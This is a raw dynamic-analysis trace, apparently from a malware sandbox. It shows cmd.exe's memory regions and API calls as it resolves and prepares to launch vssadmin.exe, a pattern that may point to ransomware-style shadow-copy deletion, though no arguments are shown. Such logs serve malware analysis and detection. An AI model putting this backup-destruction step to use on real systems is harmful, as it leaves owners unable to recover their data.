	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5492
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5493
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5494
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5495
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5496
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 5497
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 5498
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 5499
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 5500
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 5501
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 5502
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 5503
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5504
	        start_va = 0x7f2c0000
	          end_va = 0x7f2e2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f2c0000"
	        filename = ""

Region:
	              id = 5505
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5506
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5507
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5508
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5509
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5510
	        start_va = 0x1c0000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5511
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5512
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5513
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5514
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5515
	        start_va = 0x4600000
	          end_va = 0x475ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5518
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5519
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5520
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5521
	        start_va = 0x7f1c0000
	          end_va = 0x7f2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f1c0000"
	        filename = ""

Region:
	              id = 5696
	        start_va = 0x4760000
	          end_va = 0x481dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5697
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5698
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5699
	        start_va = 0x260000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000260000"
	        filename = ""

Region:
	              id = 5700
	        start_va = 0x4820000
	          end_va = 0x491ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004820000"
	        filename = ""

Region:
	              id = 5701
	        start_va = 0x4920000
	          end_va = 0x4a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004920000"
	        filename = ""

Region:
	              id = 5704
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 5783
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 5796
	        start_va = 0x4a80000
	          end_va = 0x4db6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 401
	os_tid = 0x1134

	[0317.713] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0317.714] GetProcessHeap () returned 0x4660000
	[0317.714] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x400a) returned 0x466ba78
	[0317.714] GetProcessHeap () returned 0x4660000
	[0317.715] RtlFreeHeap (HeapHandle=0x4660000, Flags=0x0, BaseAddress=0x466ba78) returned 1
	[0317.717] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0317.717] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0317.717] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0317.717] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0317.717] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0317.717] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0317.717] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0317.717] GetProcessHeap () returned 0x4660000
	[0317.717] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x58) returned 0x4664310
	[0317.717] GetProcessHeap () returned 0x4660000
	[0317.718] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x1a) returned 0x4664370
	[0317.720] GetProcessHeap () returned 0x4660000
	[0317.720] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x52) returned 0x4664398
	[0317.723] GetConsoleTitleW (in: lpConsoleTitle=0x18f468, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0317.934] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0317.934] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0317.934] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0317.935] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0317.936] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0317.937] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0317.938] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0317.939] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0317.940] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0317.942] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0317.943] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0317.944] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0317.944] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0317.945] GetProcessHeap () returned 0x4660000
	[0317.945] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x210) returned 0x4669128
	[0317.945] GetProcessHeap () returned 0x4660000
	[0317.945] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x64) returned 0x4669340
	[0317.946] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0317.946] GetProcessHeap () returned 0x4660000
	[0317.946] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x418) returned 0x46693b0
	[0317.947] SetErrorMode (uMode=0x0) returned 0x0
	[0317.947] SetErrorMode (uMode=0x1) returned 0x0
	[0317.947] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46693b8, lpFilePart=0x18ef74 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18ef74*="Desktop") returned 0x1d
	[0317.947] SetErrorMode (uMode=0x0) returned 0x1
	[0317.948] GetProcessHeap () returned 0x4660000
	[0317.948] RtlReAllocateHeap (Heap=0x4660000, Flags=0x0, Ptr=0x46693b0, Size=0x56) returned 0x46693b0
	[0317.948] GetProcessHeap () returned 0x4660000
	[0317.948] RtlSizeHeap (HeapHandle=0x4660000, Flags=0x0, MemoryPointer=0x46693b0) returned 0x56
	[0317.948] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0317.948] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0317.949] GetProcessHeap () returned 0x4660000
	[0317.949] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x182) returned 0x4669410
	[0317.949] GetProcessHeap () returned 0x4660000
	[0317.949] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x2fc) returned 0x46605c8
	[0318.061] GetProcessHeap () returned 0x4660000
	[0318.061] RtlReAllocateHeap (Heap=0x4660000, Flags=0x0, Ptr=0x46605c8, Size=0x184) returned 0x46605c8
	[0318.061] GetProcessHeap () returned 0x4660000
	[0318.062] RtlSizeHeap (HeapHandle=0x4660000, Flags=0x0, MemoryPointer=0x46605c8) returned 0x184
	[0318.062] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0318.062] GetProcessHeap () returned 0x4660000
	[0318.062] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0xe0) returned 0x46695a0
	[0318.068] GetProcessHeap () returned 0x4660000
	[0318.068] RtlReAllocateHeap (Heap=0x4660000, Flags=0x0, Ptr=0x46695a0, Size=0x76) returned 0x46695a0
	[0318.068] GetProcessHeap () returned 0x4660000
	[0318.068] RtlSizeHeap (HeapHandle=0x4660000, Flags=0x0, MemoryPointer=0x46695a0) returned 0x76
	[0318.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0318.070] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed00) returned 0xffffffff
	[0318.071] GetLastError () returned 0x2
	[0318.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0318.072] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed00) returned 0xffffffff
	[0318.072] GetLastError () returned 0x2
	[0318.072] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0318.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed00) returned 0x46643f8
	[0318.073] GetProcessHeap () returned 0x4660000
	[0318.073] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x0, Size=0x14) returned 0x4667b10
	[0318.073] FindClose (in: hFindFile=0x46643f8 | out: hFindFile=0x46643f8) returned 1
	[0318.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed00) returned 0xffffffff
	[0318.074] GetLastError () returned 0x2
	[0318.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed00) returned 0x46643f8
	[0318.074] GetProcessHeap () returned 0x4660000
	[0318.074] RtlReAllocateHeap (Heap=0x4660000, Flags=0x0, Ptr=0x4667b10, Size=0x4) returned 0x4664438
	[0318.074] FindClose (in: hFindFile=0x46643f8 | out: hFindFile=0x46643f8) returned 1
	[0318.075] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0318.075] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0318.075] GetConsoleTitleW (in: lpConsoleTitle=0x18f1f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0318.288] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f120, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f104 | out: lpAttributeList=0x18f120, lpSize=0x18f104) returned 1
	[0318.288] UpdateProcThreadAttribute (in: lpAttributeList=0x18f120, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f10c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f120, lpPreviousValue=0x0) returned 1
	[0318.288] GetStartupInfoW (in: lpStartupInfo=0x18f158 | out: lpStartupInfo=0x18f158*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0318.288] GetProcessHeap () returned 0x4660000
	[0318.288] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0x18) returned 0x4667c50
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0318.289] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0318.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0318.291] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0318.292] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0318.292] GetProcessHeap () returned 0x4660000
	[0318.292] RtlFreeHeap (HeapHandle=0x4660000, Flags=0x0, BaseAddress=0x4667c50) returned 1
	[0318.292] GetProcessHeap () returned 0x4660000
	[0318.292] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0xa) returned 0x46643f8
	[0318.292] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
